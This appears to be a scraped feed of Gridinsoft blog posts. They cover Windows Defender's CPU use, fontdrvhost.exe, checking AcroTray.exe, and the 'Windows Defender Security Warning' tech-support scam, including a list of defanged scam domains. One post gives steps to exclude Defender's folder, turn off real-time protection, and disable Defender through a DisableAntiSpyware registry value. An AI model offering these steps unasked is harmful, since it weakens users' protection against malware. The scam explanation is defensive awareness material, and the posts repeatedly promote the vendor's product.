What to Do if the Problem Persists?

If you have followed all the steps above and still see this warning every time you use a web browser, it is a clear sign that malware is still on your computer. You can use professional antimalware software such as GridinSoft Anti-Malware to scan your computer and remove any viruses or malware found. After taking such drastic measures, the antimalware software will remove and neutralize more dangerous cyber threats that could cause severe damage to your files.

Download Anti-Malware

How to Avoid Scams like the Windows Defender Security Warning

As mentioned earlier, the Windows Defender security warning scam is not the only threat you may encounter on your computer. There is much more severe malware on the Internet, and as a prudent user, you should take every precaution to avoid them. Here are some basic tips:

Ensure your OS and apps are up to date
Only download apps from official websites
Avoid clicking on random links without knowing where they will take you
Don’t download suspicious apps
Do not open attachments in suspicious emails
Use an ad blocker to block malicious ads
Use advanced antivirus software

Your computer should now be clean and free of Windows Defender scams. To prevent this from happening again, practice good online hygiene to protect yourself from fraud. Perform regular scans and use malware protection to stop threats before they happen.

The post Windows Defender Security Warning appeared first on Gridinsoft Blog.

Antimalware Service Executable

Stephanie Adlam — Fri, 14 Jun 2024 18:12:38 +0000

Antimalware Service Executable is a system process that belongs to Windows Defender. Usually, it does not cause any issues, and the user does not notice it. In some cases, it can consume an abnormal amount of resources. I have compiled some practical solutions to address this problem in this article.

What is Antimalware Service Executable?

The Antimalware Service Executable is a core process of Microsoft Windows Defender, the built-in antivirus software in Windows. This process, also known as MsMpEng.exe, runs in the background to provide real-time protection against malware and other security threats. However, some Internet users complain that this process consumes an excessive amount of resources at times, which causes discomfort when using the PC.

There are several factors responsible for this. First, Defender periodically performs a full scanning, analyzing every file in the system. Such a process requires a lot of resources, so some devices start to slow down. Second, like most modern anti-malware solutions, Defender uses heuristic detection to check certain elements with special attention, potentially causing temporary system slowdowns.

Although all anti-malware solutions consume a significant amount of resources during a scanning process, none of the third-party ones have an annoying habit of starting the scan sporadically. Also, due to certain bugs, it may simply hang up on a certain point of the scanning process, keeping the resource consumption high. Let me explain how to fix such a behavior.

Resolve of Antimalware Service Executable High CPU Consumption

There are several ways to solve the problem of excessive resource consumption by Defender. They are not complicated, but they do require some action from the user:

Disable Scheduled Scans in Task Scheduler

The main reason for Antimalware Service Executable high CPU consumption is that Defender runs a full scan, regardless of whether the user is actively using the device or the system is idling. The solution is to set a specific time for Defender to perform a full system scan. This is something like Active Hours in the Windows Update section, which does not apply to Defender’s activity for some reason. To change the scan schedule, press Start, type “Task Scheduler”, and open it.

In the left pane, click Task Scheduler Library, then navigate to Library→Microsoft→Windows→Windows Defender. You will see Windows Defender Scheduled Scan, Windows Defender Cache Maintenance, Windows Defender Cleanup, and Windows Defender Verification in the middle pane as you open the Windows Defender folder. All these four services need to undergo the following procedure.

We will start with Windows Defender Scheduled Scan. Double-click on it, click the Conditions tab, and uncheck all options to clear scheduled scans.

Now, you must create a trigger to call a task at a certain time. To do this, go to the “Triggers” section and click “New…”.

Select a time that will not interfere with your activities, choose “Daily”, and set how often Defender will perform the scan (by default, it is recurring every day), then click “OK”. If you do not need the scans to happen at all, you can just keep this parameter at “Disabled”. Repeat these actions for each item.

Exclude MsMpEng.exe from Scans

One particular place where Microsoft Defender may have issues is while scanning its own files. The ultimate privileges of this program obviously conflict with themselves when it comes to scanning its files. To fix this silly issue, open Task Manager and find Antimalware Service Executable in the processes list. Right-click on it and select Open File Location in the drop-down menu.

In the opened window, you need to copy the full path of the Antimalware Service Executable. Click on the address bar with the right mouse button and press “Copy path”.

Now launch Windows Defender. You can use the Start Menu search bar to input Windows Defender right there and open the first found item.

In the opened Windows Defender Security Center, go to “Virus & threat protection” → Virus & threat protection settings.

Scroll the settings down to Exclusions and click “Add or Remove exclusions”. On the opened screen, press Add and Exclusion, select Folder, and paste the path from your clipboard. Click Open, and Windows Defender will not scan the folder where Antimalware Service Executable is located.

Disabling of the On-run Protection

This method is the quickest and a temporary solution, as it disables its background protection until the next system startup. Open Defender, click “Virus & threat protection”, and select “Manage settings”. Switch all the toggles to the “Off” position.

Completely Disable Windows Defender

I strongly advise against completely disabling Defender, as it puts your system at risk. However, if you accept all the risks, follow the instructions carefully, as changing various registry settings can lead to serious system problems.

In the opened Registry Editor, take the following path using the navigation pane on the left side of the window: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender

Right-click the right pane of the Registry Editor window and, in the dropdown menu, select: New → DWORD (32-bit) Value. Name this entry DisableAntiSpyware. Double-click the entry and set its value to 1.

Use an Alternative Solution

If you still decide to stop using Windows Defender, you can use alternative solutions from third-party developers. GridinSoft Anti-Malware is an excellent alternative to the standard Windows solution. Moreover, it has several advantages, including optimization—the application consumes a moderate amount of resources during a full scan, allowing for comfortable use even on devices with less powerful hardware.

Additionally, GridinSoft Anti-Malware includes an Internet Security module, which blocks phishing and potentially unsafe websites. Furthermore, using this tool does not require disabling Windows Defender, allowing you to use both solutions simultaneously, complementing each other.

The post Antimalware Service Executable appeared first on Gridinsoft Blog.

Usermode Font Driver Host (fontdrvhost.exe)

Stephanie Adlam — Thu, 13 Jun 2024 09:14:41 +0000

The Usermode Font Driver Host process is an important part of the Windows operating system. It may raise questions among users due to its high consumption of resources such as CPU and memory. Let’s find out what this process is and whether you can do without it.

What is Usermode Font Driver Host?

The Usermode Font Driver Host process, as its name suggests, is responsible for handling fonts in user mode, which helps the system display text in various applications and interfaces. The running process is usually located in the standard system directory C:\Windows\System32\fontdrvhost.exe. This process also handles requests from applications and programs that require font rendering services. Among the latter is everything from basic text display to complex font formatting in documents and web pages.

In recent Windows updates, when you try to find the fontdrvhost.exe process in Task Manager, you will see that it is running under the user name “UMFD-0”. This is an account for the User Mode Driver Framework, which restricts the process’s access to only working with fonts. This provides the security that recent Windows updates have brought. The UMFD-0 account ensures that the process does not extend to activities other than font manipulation.

Usermode Font Driver Host High CPU and Memory Troubleshooting

High consumption of CPU and memory resources by the Usermode Font Driver Host process may occur in several cases. First one is you are working with graphic editors, designing programs or loading a large number of non-standard fonts.

Alternatively, increased consumption also can be caused by incorrect operation or failure in the Windows font management system. When corrupted or incorrectly created fonts are installed in the system, Usermode Font Driver Host may consume an excessive amount of resources trying to process or fix them.

Problems with Usermode Font Driver Host may be related to a corrupted UMFD-0 image. There are a couple of ways to solve this problem – through running a system files’ scan, or by updating Windows. Let’s start with the least invasive one.

Step 1: Run System File Checker

Windows carries quite a few system recovery utilities that will be helpful with pretty much any situation. In the case of file corruption, a tool called System File Checker will be on hand.

Open a command prompt as administrator:
Type cmd in the search box and click “Run as administrator” to open elevated Command Prompt.
Type the next command “sfc/scannow” and press Enter.
Wait for the scanning process to complete and errors to be corrected.
Restart your computer after the scan is complete.

If System File Checker does not solve the problem, it may indicate deeper system irregularities. In such a case, it is recommended to update Windows to replace and update system files, which may fix existing system problems.

Step 2: Update Windows

Windows Update is an effective solution to the problem of high resource consumption caused by incompatibility or a faulty system module. Each Windows updates contain bug fixes and performance improvements that can solve existing resource consumption problems. Developers constantly analyze user reports and diagnostic data to optimize system performance. To check for updates, press the Windows key + I and choose “Windows Update.” If any updates are available, download and install them.

Step 3: Removing damaged fonts

As I wrote above, the fontdrvhost.exe may consume an excessive amount of resources to process more corrupted fonts. Therefore, remove fonts that have been installed recently or may be corrupted.

To do this, go to Control Panel > Fonts.

Then, remove fonts that fall under the following description:

The font is not compatible with your encoding language
Downloaded from unreliable sources
Font is repeated several times
Not used for a long time

Can I Stop or Disable Usermode Font Driver Host?

The Usermode Font Driver Host is a crucial component in the smooth operation of many Windows applications, due to its integral role in managing font rendering processes within user sessions. Given its importance, it’s clear that this system process should not be tampered with, as it is not harmful in nature. If you’re experiencing unusual behavior related to the fontdrvhost.exe process or any system instability, it might not be the process itself but rather an indication of other underlying issues—possibly malware.

Therefore, it would be wise to conduct a comprehensive system scan for viruses or malware to ensure your system’s integrity. A reliable tool for this task is Gridinsoft Anti-Malware. This software is designed to detect and remove malware, offering a robust defense against potential threats that could masquerade as legitimate system processes or exploit them to carry out malicious activities. Regular scanning with such a tool can help maintain your system’s health and safeguard against security threats.

Download Anti-Malware

The post Usermode Font Driver Host (fontdrvhost.exe) appeared first on Gridinsoft Blog.

AcroTray.exe

Stephanie Adlam — Thu, 13 Jun 2024 05:56:07 +0000

The Acrotray.exe process is one of the important components provided by Adobe Systems. This process is associated with Adobe Acrobat software and often starts automatically when the Windows operating system starts. However, not every user knows what this process is, what it is for and whether it is safe. Let’s do a complete technical analysis of this process, its functionality, and security.

AcroTray.exe – What is it?

AcroTray.exe is an executable file that is part of the Adobe Acrobat software. This process supports PDF-related functions such as document conversion, creation, and editing directly from the desktop without having to open the Adobe Acrobat program itself. In addition, AcroTray.exe helps manage licenses and updates for Adobe products. That function is critical for enterprise users who must have all the latter up-to-date.

WIndows start-up configuration

The Acrotray.exe process usually starts at system startup and runs in the background, providing quick access to Adobe features. This may include integration with various applications such as Microsoft Office, where Acrotray.exe acts as an intermediate layer that facilitates the export and import of PDF documents. Technically, the process is a safe and important element for users of Adobe products, but its presence constantly in active processes may raise questions about the appropriateness of its use.

Main Functionalities:

The ability to convert documents to PDF format from various applications such as Microsoft Office (Word, Excel, and others) without opening Adobe Acrobat.
Help with managing the printing of PDF documents. Participates in setting up print options and selecting options right before printing. This improves the quality and accuracy of printed documents.
Automated update checks for Adobe Acrobat and other Adobe components.
Management for various plug-ins and add-ons for Adobe Acrobat, ensuring that they work properly and interact with the main program.
Informer functions, providing notifications of new features, offers, or changes to Adobe services.

Acrotray.exe is Missing – Fixing Guide

The problem with the missing Acrotray.exe file can be a major nuisance for Adobe Acrobat and Adobe Reader users. The absence of this file can cause the program to not work properly, errors during startup or while performing certain functions such as viewing PDF documents or printing them. Here are a few steps you can take to resolve this issue:

Program Recovery can via Control Panel help you recover missing files, including Acrotray.exe.

Close the Adobe Acrobat program and all Acrobat processes from Task Manager.
Then open “Control Panel” → “Programs” → “Programs and Features” → “Uninstall a program” and click “Adobe Acrobat DC”.
Press “Change” and choose “Repair” in the dialog box.
After the program repair is complete, restart your PC.

In case repair did not help, reinstall the program. For this, uninstall the program in the same Control Panel and restart the computer. Install Adobe Acrobat downloaded from the official website.

AcroTray.exe – Is it a Virus?

As I wrote above, AcroTray.exe is a completely legitimate file. Still, like with any other executable file, its name may be taken by a virus or other malware. To make sure that AcroTray.exe is safe, you should check its location. The correct path to the file should be in the folder:

C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroTray.exe
– for modern versions of Adobe Acrobat

C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\AcroTray.exe
– for older versions of Adobe Acrobat (11 and under)

Another way to understand whether the Acrotray process is legit is checking the location and digital signature of the file.

To authenticate AcroTray.exe, you can use Task Manager:

To do this, press the key combination: Ctrl+Shift+Esc

In the list of processes, find the process with the name AcroTray.exe. Right-click on the process of interest in the list. Select “Open file location“. This action will automatically open the folder where the process executable is located.

Right-click on the AcroTray.exe file and select “Properties“.

Click the “Details” tab and check the file information such as description, file size and digital signature. Legitimate Adobe files are usually digitally signed by Adobe Systems Incorporated.

Attackers may use the name AcroTray to disguise their malware – a common trick for backdoors and coin miner malware. If you find the AcroTray.exe file in an unusual location, such as AppData\Roaming or AppData\Temp folder, or its behavior is suspicious (such as excessive use of system resources), it may be a sign of infection.

Scan your system for viruses

On the other hand, if you want to completely uninstall AcroTray.exe, you can uninstall the entire Adobe Acrobat package if you don’t need it. To do this, open “Control Panel” → “Programs and Features“, find Adobe Acrobat and select “Uninstall“.

Nevertheless, to make sure that AcroTray.exe file is safe, it is recommended to perform an antivirus scan. One reliable tool for this purpose is Gridinsoft Anti-Malware. This antivirus specializes in detecting and eliminating various types of malware, including those that can hide under the guise of legitimate system files.

Download Anti-Malware

The post AcroTray.exe appeared first on Gridinsoft Blog.

Windows Defender Security Warning

Stephanie Adlam — Fri, 07 Jun 2024 16:43:55 +0000

“Windows Defender Security Warning” is a scam website that falsely claims your PC is infected and urges you to contact Microsoft tech support. This scam is part of a larger scheme aimed at deploying unwanted software on users’ devices and extracting money for resolving nonexistent issues. It has been around for some time and targets users worldwide.

Tech support scams represent a particularly notorious type of online fraud, utilizing various tactics to coerce people into making a phone call to a fake support service. The Windows Defender Security Warning scam is one of the most enduring and widespread methods used in these schemes. In this article, I will describe what this scam is, how it operates, and how you can avoid falling victim to it in the future.

What is Windows Defender Security Warning?

As mentioned earlier, the Windows Defender Security Warning typically appears as a browser window after clicking a link on a certain website. It displays numerous smaller windows, which are actually non-interactive images. These fake alerts inform the user that their PC is blocked “for security reasons”. In the background, a robotic voice claims the following:

“Important security message! Your computer has been locked up. Your IP address was used without your knowledge or consent to visit websites that contain identity theft virus. To unlock the computer please call the support immediately. Please do not attempt to shut down or restart your computer. That will lead to data loss and identity theft.”

Clicking on any of the site elements – which in fairness may happen randomly – results in the website switching to a full screen, with no obvious way out. Escape button won’t work, and roaming the mouse around the screen won’t help out either. If the victim is not aware of combinations like Ctrl+F4, Alt+Tab or Ctrl+Shift+Esc, it may look like a trap. That, along with the sound alert, is what should push the user towards following the scam’s guidance and call the support.

Typical example of a Windows Defender Security Warning page

As you can see, this is just a scam designed to capitalize on the fear of individuals who may have less knowledge about computer security or computers in general. However, let’s take a closer look at how this scam operates—there are quite a few interesting tactics involved.

Windows Defender Security Warning Mechanism Explained

The scam begins by luring users to the Windows Defender Security Warning page. To achieve this, scammers often purchase link placements on dubious websites, such as those hosting pirated movies. A user clicking on a play button or attempting to skip an ad in the video player may be redirected to the scam site.

The domains hosting this scam can vary widely, but they typically include some mention of Microsoft in the URL. In some egregious instances, fraudsters have even managed to secure hosting from Microsoft themselves. Below, you can find a list of sites used in this scam campaign:

digitalcompletes[.]online	spicyhotrecipes[.]site	rickyhousing[.]xyz
gardenhub[.]site	morningh[.]shop	robortcleaning[.]site
jadeneal[.]autos	programmaticcrooks[.]online	elhiuwf[.]cf
hitorikawag[.]top	adultfriend[.]store	yeddt[.]jet
jonwirch[.]com	aweqaw12d[.]tk	helpadvance[.]ga
333waxonet[.]ml	noblevox[.]com	risingsolutions[.]online
pixua[.]com	adultfriend[.]site	giveserendipity[.]website
connectflash[.]ml	ondigitalocean[.]app	dothrakiz[.]com
jbvhjcbjzvhxvhzcjgzvgcczgh29[.]ml	digitalflawless[.]ga	todogallina[.]es
markmoisturise[.]online	enterthecode[.]org	ebonygirlslive[.]com

Once the user lands on the scam site, it typically goes fullscreen and starts playing the previously mentioned audio message. The main goal of this message is to coerce the victim into contacting “tech support” using the phone number displayed on the site, which is mentioned multiple times. The phone call marks the final phase of the scam.

The so-called support manager begins by instructing the user to download sketchy software purported to resolve the issue—without explaining how the software addresses identity compromise. Throughout the life of this scam, various fraudulent programs have been offered, including SystemKeeper, Driver Updater, and Wise System Mechanic. As expected, all these are pseudo-effective unwanted programs that further prompt users to pay for fixing a myriad of non-existent problems.

What is the purpose of all this, you might ask? Money is the short and universal answer. The fraudsters posing as tech support managers receive commissions for each user they persuade to download the software. Meanwhile, the developers of this software profit from users purchasing licenses. Considering how long this scam has been active, the monetary turnover is quite substantial.

How to Protect Against Windows Defender Security Warning Scam?

The primary advice for protecting against the Windows Defender Security Warning scam and similar schemes is to avoid websites that initiate these scams. As mentioned, the majority of redirects to scam websites originate from pages hosting pirated content. This should be another reason to steer clear of such sites, beyond the fact that content piracy is illegal. Additionally, pirated software or games pose a significant security risk.

Learn how genuine notifications from security software should look, and how they should not. Neither Microsoft Defender nor other antivirus/antimalware programs issue security notifications through web browsers. None of them will prompt you to call support while appearing to block your computer. And, importantly, no legitimate tech support from any security vendor will ever advise you to install questionable third-party software.

Use reliable antivirus software with network protection. To prevent scam pages from opening and to ensure your system remains secure regardless of any fake alerts, a robust antivirus solution is essential. GridinSoft Anti-Malware offers excellent malware removal capabilities and network protection, backed by a multi-component detection system and regular updates.

Download Anti-Malware

The post Windows Defender Security Warning appeared first on Gridinsoft Blog.